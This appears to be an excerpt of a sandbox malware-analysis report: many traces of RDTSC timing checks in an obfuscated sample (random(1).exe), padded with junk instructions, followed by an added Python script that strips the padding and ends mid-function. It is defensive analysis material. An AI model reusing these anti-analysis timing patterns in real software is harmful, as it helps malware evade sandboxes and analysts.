Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 11704A8 second address: 11704F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007F06D8518548h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 0000001Dh 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 jnp 00007F06D8518546h 0x00000028 push 00000004h 0x0000002a xor dword ptr [ebp+12482B69h], eax 0x00000030 call 00007F06D8518549h 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 jno 00007F06D8518546h 0x0000003f rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 11704F6 second address: 11704FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 11704FC second address: 117052D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007F06D8518550h 0x0000000f jnc 00007F06D8518548h 0x00000015 popad 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a jc 00007F06D8518550h 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 117052D second address: 117053A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 117053A second address: 1170541 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1170541 second address: 1170571 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8B4D9CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d pushad 0x0000000e jmp 00007F06D8B4D9D6h 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 11707A7 second address: 117082C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F06D8518553h 0x00000009 popad 0x0000000a jmp 00007F06D8518556h 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 mov edx, dword ptr [ebp+122D1BDBh] 0x00000019 push dword ptr [ebp+1246A6DCh] 0x0000001f push 00000000h 0x00000021 push edx 0x00000022 call 00007F06D8518548h 0x00000027 pop edx 0x00000028 mov dword ptr [esp+04h], edx 0x0000002c add dword ptr [esp+04h], 00000014h 0x00000034 inc edx 0x00000035 push edx 0x00000036 ret 0x00000037 pop edx 0x00000038 ret 0x00000039 movzx edx, si 0x0000003c call 00007F06D8518549h 0x00000041 pushad 0x00000042 jmp 00007F06D8518556h 0x00000047 push eax 0x00000048 push edx 0x00000049 jns 00007F06D8518546h 0x0000004f rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 117082C second address: 1170867 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push edx 0x0000000a jmp 00007F06D8B4D9D5h 0x0000000f pop edx 0x00000010 pushad 0x00000011 jc 00007F06D8B4D9C6h 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a popad 0x0000001b mov eax, dword ptr [esp+04h] 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 jg 00007F06D8B4D9C6h 0x00000028 pushad 0x00000029 popad 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1170867 second address: 1170871 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F06D8518546h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1170871 second address: 1170875 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 11739CD second address: 11739EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F06D851854Ch 0x00000009 jc 00007F06D8518546h 0x0000000f popad 0x00000010 pop edx 0x00000011 jng 00007F06D851855Ah 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 11739EE second address: 11739F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 11739F4 second address: 11739FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 117555F second address: 1175563 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D70291 second address: 4D70295 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D70295 second address: 4D70299 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D70299 second address: 4D7029F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D7029F second address: 4D702EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F06D8B4D9D2h 0x00000008 movzx esi, bx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f jmp 00007F06D8B4D9CAh 0x00000014 mov dword ptr [esp], ebp 0x00000017 pushad 0x00000018 movzx ecx, dx 0x0000001b movsx edi, ax 0x0000001e popad 0x0000001f mov ebp, esp 0x00000021 pushad 0x00000022 mov bl, cl 0x00000024 jmp 00007F06D8B4D9CDh 0x00000029 popad 0x0000002a pop ebp 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e movsx edi, ax 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D702EC second address: 4D702F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D70320 second address: 4D70344 instructions: 0x00000000 rdtsc 0x00000002 mov dx, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F06D8B4D9D9h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D70344 second address: 4D7034A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D7034A second address: 4D7034E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D7034E second address: 4D703D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8518553h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F06D8518559h 0x00000011 xchg eax, ebp 0x00000012 pushad 0x00000013 mov eax, 55ED7F73h 0x00000018 call 00007F06D8518558h 0x0000001d movzx esi, bx 0x00000020 pop edi 0x00000021 popad 0x00000022 mov ebp, esp 0x00000024 pushad 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007F06D8518555h 0x0000002c sbb ch, 00000016h 0x0000002f jmp 00007F06D8518551h 0x00000034 popfd 0x00000035 popad 0x00000036 push eax 0x00000037 push edx 0x00000038 mov edx, eax 0x0000003a rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D703D9 second address: 4D703EE instructions: 0x00000000 rdtsc 0x00000002 mov edi, eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F06D8B4D9CBh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D7047C second address: 4D704FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F06D851854Fh 0x00000009 sub eax, 4A665E7Eh 0x0000000f jmp 00007F06D8518559h 0x00000014 popfd 0x00000015 mov dh, ah 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push F74EBB96h 0x0000001f pushad 0x00000020 mov bx, si 0x00000023 push ecx 0x00000024 mov eax, edi 0x00000026 pop ebx 0x00000027 popad 0x00000028 add dword ptr [esp], 7D976092h 0x0000002f jmp 00007F06D8518558h 0x00000034 call 00007F074859C057h 0x00000039 push 74DF27D0h 0x0000003e push dword ptr fs:[00000000h] 0x00000045 mov eax, dword ptr [esp+10h] 0x00000049 mov dword ptr [esp+10h], ebp 0x0000004d lea ebp, dword ptr [esp+10h] 0x00000051 sub esp, eax 0x00000053 push ebx 0x00000054 push esi 0x00000055 push edi 0x00000056 mov eax, dword ptr [74E80140h] 0x0000005b xor dword ptr [ebp-04h], eax 0x0000005e xor eax, ebp 0x00000060 push eax 0x00000061 mov dword ptr [ebp-18h], esp 0x00000064 push dword ptr [ebp-08h] 0x00000067 mov eax, dword ptr [ebp-04h] 0x0000006a mov dword ptr [ebp-04h], FFFFFFFEh 0x00000071 mov dword ptr [ebp-08h], eax 0x00000074 lea eax, dword ptr [ebp-10h] 0x00000077 mov dword ptr fs:[00000000h], eax 0x0000007d ret 0x0000007e push eax 0x0000007f push edx 0x00000080 jmp 00007F06D8518557h 0x00000085 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D704FF second address: 4D70537 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8B4D9D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and dword ptr [ebp-04h], 00000000h 0x0000000d jmp 00007F06D8B4D9CEh 0x00000012 mov edx, dword ptr [ebp+0Ch] 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D70537 second address: 4D7053D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D7053D second address: 4D70565 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8B4D9D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F06D8B4D9CAh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D70565 second address: 4D70574 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D851854Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D70574 second address: 4D7058C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F06D8B4D9D4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D7058C second address: 4D705B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov al, byte ptr [edx] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d call 00007F06D8518558h 0x00000012 pop eax 0x00000013 mov cl, bl 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D705B5 second address: 4D7060F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8B4D9CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 inc edx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F06D8B4D9CCh 0x00000011 sub ecx, 656E8948h 0x00000017 jmp 00007F06D8B4D9CBh 0x0000001c popfd 0x0000001d mov dl, cl 0x0000001f popad 0x00000020 test al, al 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 pushad 0x00000026 popad 0x00000027 pushfd 0x00000028 jmp 00007F06D8B4D9CAh 0x0000002d and esi, 66884BA8h 0x00000033 jmp 00007F06D8B4D9CBh 0x00000038 popfd 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D7060F second address: 4D70627 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F06D8518554h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D70627 second address: 4D705B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8B4D9CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F06D8B4D91Ch 0x00000011 mov al, byte ptr [edx] 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 call 00007F06D8B4D9D8h 0x0000001b pop eax 0x0000001c mov cl, bl 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D70670 second address: 4D70683 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D851854Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D70683 second address: 4D706FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8B4D9D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 dec edi 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F06D8B4D9CCh 0x00000011 sub cx, 3858h 0x00000016 jmp 00007F06D8B4D9CBh 0x0000001b popfd 0x0000001c call 00007F06D8B4D9D8h 0x00000021 mov esi, 09FE2891h 0x00000026 pop ecx 0x00000027 popad 0x00000028 lea ebx, dword ptr [edi+01h] 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F06D8B4D9D8h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D706FC second address: 4D70712 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D851854Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov al, byte ptr [edi+01h] 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D70712 second address: 4D7072D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 mov bl, cl 0x00000008 pop ebx 0x00000009 popad 0x0000000a inc edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F06D8B4D9CCh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D7072D second address: 4D7073C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D851854Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D7073C second address: 4D707D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F06D8B4D9CFh 0x00000009 add cl, FFFFFFEEh 0x0000000c jmp 00007F06D8B4D9D9h 0x00000011 popfd 0x00000012 mov edx, esi 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 test al, al 0x00000019 jmp 00007F06D8B4D9CAh 0x0000001e jne 00007F0748BC5CC8h 0x00000024 jmp 00007F06D8B4D9D0h 0x00000029 mov ecx, edx 0x0000002b jmp 00007F06D8B4D9D0h 0x00000030 shr ecx, 02h 0x00000033 jmp 00007F06D8B4D9D0h 0x00000038 rep movsd 0x0000003a rep movsd 0x0000003c rep movsd 0x0000003e rep movsd 0x00000040 rep movsd 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007F06D8B4D9D7h 0x00000049 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D707D3 second address: 4D707D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D707D9 second address: 4D707DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D707DD second address: 4D707F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f mov ecx, 11246AA5h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D707F2 second address: 4D70804 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F06D8B4D9CEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D70804 second address: 4D70836 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D851854Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b and ecx, 03h 0x0000000e jmp 00007F06D8518556h 0x00000013 rep movsb 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D70836 second address: 4D7083C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D7083C second address: 4D70861 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8518554h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [ebp-04h], FFFFFFFEh 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D70861 second address: 4D70865 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D70865 second address: 4D70869 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D70869 second address: 4D7086F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D7086F second address: 4D70875 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D70875 second address: 4D70879 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D70879 second address: 4D708C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, ebx 0x0000000a pushad 0x0000000b mov ch, 20h 0x0000000d pushfd 0x0000000e jmp 00007F06D8518555h 0x00000013 adc esi, 5290EDC6h 0x00000019 jmp 00007F06D8518551h 0x0000001e popfd 0x0000001f popad 0x00000020 mov ecx, dword ptr [ebp-10h] 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F06D851854Dh 0x0000002a rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D708C7 second address: 4D708F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F06D8B4D9D7h 0x00000008 mov bh, cl 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr fs:[00000000h], ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D708F3 second address: 4D708F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D708F9 second address: 4D70944 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F06D8B4D9D5h 0x00000009 or esi, 663F09E6h 0x0000000f jmp 00007F06D8B4D9D1h 0x00000014 popfd 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pop ecx 0x0000001b pushad 0x0000001c movzx esi, dx 0x0000001f popad 0x00000020 pop edi 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F06D8B4D9CCh 0x00000028 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D70944 second address: 4D7094A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D7094A second address: 4D7094E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D7094E second address: 4D7047C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 pushad 0x0000000a mov ax, dx 0x0000000d mov ecx, ebx 0x0000000f popad 0x00000010 pop ebx 0x00000011 pushad 0x00000012 mov edi, 28760A7Eh 0x00000017 mov al, dh 0x00000019 popad 0x0000001a leave 0x0000001b jmp 00007F06D851854Eh 0x00000020 retn 0008h 0x00000023 cmp dword ptr [ebp-2Ch], 10h 0x00000027 mov eax, dword ptr [ebp-40h] 0x0000002a jnc 00007F06D8518545h 0x0000002c push eax 0x0000002d lea edx, dword ptr [ebp-00000590h] 0x00000033 push edx 0x00000034 call esi 0x00000036 push 00000008h 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007F06D8518557h 0x0000003f rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D70A30 second address: 4D70A55 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 64CAh 0x00000007 mov ebx, 0DE50396h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F06D8B4D9D3h 0x00000017 rdtsc
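The interceptor lines above are traces of everything that executed between two consecutive rdtsc reads, and most of it is mutation padding: push/pop pairs, pushad/popad envelopes around register-only moves, and jumps to the next instruction. The Python below is an added example and not part of the Joe Sandbox report; it parses three of those lines (copied verbatim from the report) and strips the padding so that the instructions that do real work between the two time reads stand out. In one trace that is nothing at all (a pure timing window), in another two movs, and in the third a function epilogue, a compare and a call, showing the checks are spliced between ordinary code. The padding rules are a heuristic assumption of this example (register-only instructions inside a pushad/popad envelope are undone by the popad; push/pop, pushfd/popfd, unconditional jmp and the reads themselves are treated as filler), not a statement about the protector's internals.

```python
"""Strip mutation padding from the RDTSC interceptor listings."""
import re
from collections import namedtuple

Insn = namedtuple("Insn", "offset mnemonic operands")
Record = namedtuple("Record", "first second listing")

LINE_RE = re.compile(r"First address: ([0-9A-Fa-f]+) second address: ([0-9A-Fa-f]+) "
                     r"instructions: (.*)$")
OFFSET_RE = re.compile(r"\s*0x([0-9a-fA-F]{8})\s+")
STACK_SHUFFLE = {"push", "pop", "pushad", "popad", "pushfd", "popfd"}

PREFIX = "Source: C:\\Users\\user\\Desktop\\random(1).exe RDTSC instruction interceptor: "
# Constructed sample: three interceptor lines copied from the report.
SAMPLE_LINES = [
    PREFIX + "First address: 4D70861 second address: 4D70865 instructions: "
    "0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc",
    PREFIX + "First address: 4D70879 second address: 4D708C7 instructions: "
    "0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx "
    "0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, ebx "
    "0x0000000a pushad 0x0000000b mov ch, 20h 0x0000000d pushfd 0x0000000e jmp 00007F06D8518555h "
    "0x00000013 adc esi, 5290EDC6h 0x00000019 jmp 00007F06D8518551h 0x0000001e popfd "
    "0x0000001f popad 0x00000020 mov ecx, dword ptr [ebp-10h] 0x00000023 push eax "
    "0x00000024 push edx 0x00000025 jmp 00007F06D851854Dh 0x0000002a rdtsc",
    PREFIX + "First address: 4D7094E second address: 4D7047C instructions: "
    "0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax "
    "0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 pushad 0x0000000a mov ax, dx "
    "0x0000000d mov ecx, ebx 0x0000000f popad 0x00000010 pop ebx 0x00000011 pushad "
    "0x00000012 mov edi, 28760A7Eh 0x00000017 mov al, dh 0x00000019 popad 0x0000001a leave "
    "0x0000001b jmp 00007F06D851854Eh 0x00000020 retn 0008h 0x00000023 cmp dword ptr [ebp-2Ch], 10h "
    "0x00000027 mov eax, dword ptr [ebp-40h] 0x0000002a jnc 00007F06D8518545h 0x0000002c push eax "
    "0x0000002d lea edx, dword ptr [ebp-00000590h] 0x00000033 push edx 0x00000034 call esi "
    "0x00000036 push 00000008h 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007F06D8518557h "
    "0x0000003f rdtsc",
]


def parse_listing(text):
    """'0x00000000 rdtsc 0x00000002 jmp 00007F06D8518554h ...' -> [Insn, ...]"""
    parts = OFFSET_RE.split(text.strip())   # ['', off, insn, off, insn, ...]
    out = []
    for i in range(1, len(parts) - 1, 2):
        mnem, _, ops = parts[i + 1].strip().partition(" ")
        out.append(Insn(int(parts[i], 16), mnem.lower(), ops.strip()))
    return out


def parse_report_line(line):
    m = LINE_RE.search(line)
    if not m:
        raise ValueError("not an RDTSC interceptor line")
    return Record(int(m.group(1), 16), int(m.group(2), 16), parse_listing(m.group(3)))


def writes_memory(insn):
    # Destination operand such as 'dword ptr [ebp-04h]' or 'dword ptr fs:[00000000h]'
    return insn.operands.split(",")[0].strip().endswith("]")


def effective_instructions(listing):
    """Drop the padding (heuristic, see lead-in) and keep what does real work."""
    kept, depth = [], 0
    for insn in listing:
        if insn.mnemonic == "pushad":
            depth += 1
            continue
        if insn.mnemonic == "popad":
            depth = max(depth - 1, 0)
            continue
        # Register-only work inside a pushad/popad envelope is discarded by the popad.
        if depth and not writes_memory(insn) and insn.mnemonic not in ("call", "retn", "ret"):
            continue
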